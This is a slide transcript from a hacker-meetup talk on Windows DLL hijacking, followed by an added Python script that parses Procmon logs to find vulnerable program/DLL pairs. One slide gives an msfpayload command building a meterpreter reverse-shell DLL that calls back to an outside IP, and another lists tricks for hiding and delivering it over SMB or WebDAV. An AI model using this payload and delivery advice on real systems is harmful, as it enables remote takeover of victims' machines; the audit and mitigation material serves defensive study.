Dll hijacking

DLL Hijacking over view and demo presentation presented at the October Rochester 2600 meeting.

Dll hijacking Presentation Transcript

  • 1. How To Become a Hijacking Terrorist
    DLL Hijacking for fun and profit
  • 2. DLL Hijacking Overview
    DLL Hijacking: Trick a program to use a malicious DLL instead of the normal DLL
    HDM found that when a file associated with a program is opened, the program looks for its referenced DLLs in the file's local path first, before looking in the correct location next to the associated executable
  • 3. PCAP Example - Normal
  • 4. PCAP Example - Hijacked
  • 5. DLL Hijacking
    Old trick – new dog
    Linux removed “.” from $PATH
    Client side, WebDAV, or remote SMB share
    Widely exploitable
    Easy to detect
  • 6. DLLHijackAuditKit
    Automates the detection
    Generates test scenarios for each file extension and automatically creates an exploitable file
    Searches every extension
  • 7. Demo
  • 8. Audit.js
    Download procmon from sysinternals
    Opens procmon and filters for operations that begin with "IRP_MJ_" or "FASTIO_".
    Use WMI to query the local system and find all the possible file extensions it can handle
    Generate test cases for each file scenario. Make a dummy file with the word “Howdy…” in it named after the extension being tested
    Automatically open each file from command line
    While opening, log file system activity in procmon
    Wait a few seconds and then close out the program and try the next file
    When you get all done, you need to save the procmon file as LogFile.csv. This logfile will have the executable related to the file that was opened and also the path that it tried to look for a DLL.
  • 9. Analyze.js
    Parses the LogFile.csv for the executable and the DLL that it was looking for (wireshark.exe and airpcap.dll)
    Generate test scenarios and copy in a dummy DLL named after the real DLL it’s looking for.
    Run the file again
    If the hijack is successful, the dummy DLL creates a text file named exploit.txt
    Repeat this step for each EXE and DLL pair to verify which are actively exploitable
  • 10. Real World Attack Scenario
    Generate Payload: msfpayload windows/meterpreter/reverse_tcp LHOST=66.66.66.66 LPORT=4242 D > exploit.dll
    Rename to the DLL that the EXE is looking for
    Put the DLL in the same folder as a file with an associated extension
    Deliver file and DLL
  • 11. Tricks
    Use the Hidden attribute
    Obfuscate with lots of other files
    MSFEncode the payload
    Create a link to a subfolder
    Road Apples
    Host a SMB share on the net!
    Create a WebDAV share
  • 12. Mitigation
    Admins:
    Microsoft tool to catch illegal DLL references
    http://support.microsoft.com/kb/2264107
    CWDIllegalInDllSearch registry
    Disable WebDAV
    Disable outbound SMB (ports 139, 445)
    Developers:
    Load DLLs securely
  • 13. References
    http://www.microsoft.com/technet/security/advisory/2269637.mspx
    http://blog.metasploit.com/2010/08/better-faster-stronger.html
  • 14. 0day (AFAIK)
    RDP .dll
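The LogFile.csv parsing that slide 9 describes for Analyze.js, as an added Python example rather than the kit's own JavaScript: it pulls out every (executable, DLL) pair where a program probed the test folder for a DLL that was not there, which is the search-order signature the audit looks for. The Procmon column names and the sample rows are constructed, and the test directory is assumed to be the folder the dummy files were opened from.

```python
import csv
import io
import ntpath

# Constructed Procmon CSV export (not a real capture). Dummy files were opened
# from C:\audit; each handler's DLL probes appear as IRP_MJ_CREATE rows.
SAMPLE_LOGFILE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"1:02:03.1","wireshark.exe","4120","IRP_MJ_CREATE","C:\audit\airpcap.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.2","wireshark.exe","4120","IRP_MJ_CREATE","C:\Windows\System32\airpcap.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.3","wireshark.exe","4120","IRP_MJ_CREATE","C:\audit\test.pcap","SUCCESS","Desired Access: Generic Read"
"1:02:04.0","notepad.exe","5000","IRP_MJ_CREATE","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse"
"1:02:05.0","viewer.exe","5100","FASTIO_QUERY_OPEN","C:\audit\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:05.1","viewer.exe","5100","IRP_MJ_READ","C:\audit\test.vwr","SUCCESS","Offset: 0, Length: 5"
'''


def find_candidate_pairs(logfile_text, test_dir):
    """Return sorted (exe, dll) pairs where a process looked for a DLL in
    test_dir and got NAME NOT FOUND, i.e. the file's folder was searched
    before the DLL's real location. These are the pairs to re-test with a
    dummy DLL, as the kit does in its next step."""
    wanted_dir = ntpath.normcase(test_dir.rstrip("\\")) + "\\"
    pairs = set()
    for row in csv.DictReader(io.StringIO(logfile_text)):
        op = row.get("Operation", "")
        # Same filter the kit applies in Procmon: raw file-system operations only.
        if not (op.startswith("IRP_MJ_") or op.startswith("FASTIO_")):
            continue
        if row.get("Result") != "NAME NOT FOUND":
            continue
        # normcase lower-cases and normalises separators, so the comparison
        # is case-insensitive like the Windows file system.
        head, tail = ntpath.split(ntpath.normcase(row.get("Path", "")))
        if not tail.endswith(".dll") or head + "\\" != wanted_dir:
            continue
        pairs.add((row["Process Name"].lower(), tail))
    return sorted(pairs)


if __name__ == "__main__":
    for exe, dll in find_candidate_pairs(SAMPLE_LOGFILE_CSV, "C:\\audit"):
        print(f"{exe} searched the test folder for {dll}")
```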